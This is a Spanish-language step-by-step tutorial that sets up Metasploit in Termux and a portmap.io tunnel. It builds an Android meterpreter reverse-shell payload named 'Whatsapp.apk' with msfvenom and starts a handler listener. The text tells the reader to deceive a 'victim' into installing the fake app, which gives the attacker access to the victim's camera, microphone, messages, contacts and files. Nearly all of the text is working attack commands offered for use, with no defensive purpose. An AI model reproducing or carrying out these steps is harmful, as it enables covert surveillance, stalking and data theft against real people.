INGRESA A WHATSAPP | METASPLOIT
Dentro de termux, escribir los siguientes comandos... Cabe aclarar que despues de escribir cada comando en Termux tienes que pulsar la tecla Enter y si en la instalacion de cualquier paquete te hacen una pregunta asi [Y/N] deberas responder de forma afirmativa con la letra ( y ) sin los parentesis y despues pulsar Enter, estos son los comandos:
apt update && apt upgrade -y
termux-setup-storage
pkg install unstable-repo
pkg install metasploit
El primer comando que escribiste busca actualizaciones en termux y si las encuentra las instala.
El segundo comando que escribiste otorga permisos de almacenamiento a Termux para que puedas acceder a las herramientas y carpetas que instalaras a continuacion.
El tercer comando que escribiste instala un complemento necesario para la instalacion de Metasploit.
El cuarto comando que escribiste instala Metasploit-Framework dentro de Termux.
AHORA SAL DE TERMUX DESDE LA BARRA DE NOTIFICACIONES EN EL BOTON QUE DICE [exit] Y SIGUE ESTOS PASOS:
Ir al Navegador de Google Chrome (OJO, DEBE SER ESTE NAVEGADOR)
Pulsar en los 3 puntos que estan en la parte superior derecha del navegador de Google Chrome y seleccionar la opcion que dice: [Sitio de Escritorio]
Ingresar a la pagina: portmap.io
Pulsar en el boton [SIGN-IN] para crear una cuenta de portmap
En el recuadro que dice [Login] escribir un Apodo, (El que tu quieras).
En el recuadro que dice [E-Mail-Address] escribir un correo electronico tuyo al que puedas ingresar.
En el recuadro que dice [Password] escribir una contraseña, (La que tu quieras).
En el recuadro que dice [Confirm Password] escribir la misma contraseña que escribiste anteriormente.
Desmarcar el visto de la casilla que dice:
[] I agree to receive newsletters from portmap.io
Marcar la casilla que dice:[] I agree to the terms of services
Para completar el registro pulsar en [+Register]
Ahora tendras que verificar tu correo electrnoico que utilizaste para registrarte en portmap, para realizarlo deberas entrar en tu correo electronico y pulsar en el enlace de verificacion que te llegara a tu bandeja de mensajes.
Regresar a la pagina portmap.io y ya estaras dentro de tu cuenta portmap.
Pulsar en el boton que dice [Configuration]
Pulsar en [Create New Configuration]
En el espacio que dice [Name] escribir cualquier nombre.
En el espacio que dice [Typ] seleccionar la opcion [OpenVPN].
En el espacio que dice [Pro] seleccionar el protocolo [tcp].
Pulsar en el boton [Generate].
Después de generar el archivo pulsar en [Download] para descargar el archivo que despues sera usado en una App. (OJO) Solo se puede descargar desde Google Chrome.
Pulsar en el boton [Create]
Muy bien, Acabas de crear tu propia configuracion que sera necesaria para crear tus PayLoads.
Pulsar en el boton que dice [MAPPING RULES].
Pulsar en [Create New Rules].
Seleccionar la opcion [Portmap.io]
En el espacio que dice [Port on your PC] escribir cualquier puerto local, en mi caso es [8080].
Pulsar en [Create].
Por lo general aqui en este paso se genera un error, en el caso de que no se haya creado tu servidor y te haya dado error, tendras que volver a cargar la pagina, seleccionar de nuevo la opcion [Portmap.io] escribir tu puerto local [8080] y pulsar en [Create].
Por lo general aqui en este paso se genera un error, en el caso de que no se haya creado tu servidor y te haya dado error, tendras que volver a cargar la pagina, seleccionar de nuevo la opcion [Portmap.io] escribir tu puerto local [8080] y pulsar en [Create].
Muy bien, hasta aqui ya tienes creado un servidor el cual servira para acceder al dispositivo de la victima en cualquier lugar que se encuentre, toma nota de los datos creados. EJEMPLO:
termuxhacking-56371.portmap.io
56371
A CONTINUACION:
Salir del navegador y entrar a Play Store e instalar la aplicacion llamada "OpenVPN Connect - Fast & Safe SSL VPN Client".
Abrir la aplicacion [OpenVPN]
Pulsar en el boton [AGREE] que aparecera cuando abras la aplicacion.
Pulsar en el boton que dice [FILE] y buscar el archivo descargado de Google Chrome, por lo general este archivo se encuentra en la carpeta Download de la memoria interna de tu dispositivo android.
Seleccionar el archivo y pulsar en el boton [Import].
Aqui aparece la direccion IP de tu conexion del servidor con otras palabras.
Borrar las demas palabras y solo dejar la direccion IP.
Pulsar en el boton [ADD].
Pulsar en el calculo de la parte superior izquierda de la pantalla para encender nuestra conexion VPN.
Te pedira permisos para encender la conexion, para darle los permisos deberas pulsar en el boton [Permitir] y esperar unos segundos hasta que nuestra conexion este encendida.
AHORA QUE YA TIENES LA CONEXION ENCENDIDA REALIZA LOS SIGUIENTES PASOS:
Salir de [OpenVPN] Pero no cerrar la Aplicacion.
Entrar a Termux, actualizar sus paquetes y crear un PayLoad con los siguientes comandos.
apt update && apt upgrade -y
msfvenom -p android/meterpreter/reverse_tcp LHOST=termuxhacking-56371.portmap.io LPORT=56371 R > /sdcard/Whatsapp.apk
AQUI YA ESTARIA CREADO EL PAYLOAD, TEN EN CUENTA QUE EL COMANDO PARA CREAR EL PAYLOAD ESTA CREADO CON LOS DATOS DE MI CONEXION, TU DEBERAS PONER LOS DATOS DE TU CONEXION, TUS DATOS LO PUEDES ENCONTRAR EN EL PASO QUE TE DIJE QUE TOMES NOTA DE TUS DATOS CREADOS, REEMPLAZA MIS DATOS CON TUS DATOS EN LA PARTE QUE DICE: [ LHOST= ] Y EN LA PARTE QUE DICE [ LPORT= ] POR LO DEMAS COPIA TODO NORMALMENTE.
Muy bien, ahora que ya esta creado tu PayLoad, deberas enviarlo a la victima y de alguna manera con alguna excusa engañala para que lo instale y lo abra por lo menos una vez, el PayLoad se encuentra en la memoria interna de tu dispositivo android con un nombre de "Whatsapp.apk".
Una vez que la victima ya haya instalado la aplicacion y la haya abierto por lo menos una vez, tu tendras acceso a toda la informacion de su dispositivo, esto incluye (camara frontal, camara trasera, Microfono, Mensajes de Texto, Contactos, Registro de llamadas, Aplicaciones, Fotos, Videos, Pdf, Carpetas, Musica, Documentos entre otros archivos). Para acceder a esta informacion sigue estos pasos:
Abrir Termux y ejecutar la consola de Metasploit-Framework para hacerlo escribe los siguientes comandos:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost termuxhacking-56371.portmap.io
set lport 8080
exploit
TEN EN CUENTA QUE LA CONSOLA DE METASPLOIT-FRAMEWORK TAMBIEN ESTA SIENDO EJECUTADA CON MIS DATOS, TU DEBERAS REEMPLAZAR MIS DATOS CON TUS DATOS EN LA PARTE QUE DICE: set lhost POR LO DEMAS COPIA TODO NORMALMENTE.
A continuaciOn despues de ejecutar esos comandos, deberas esperar un momento hasta que la consola pueda acceder al dispositivo de la victima, esto dura unos segundos hasta que sale esta palabra: [meterpreter >]
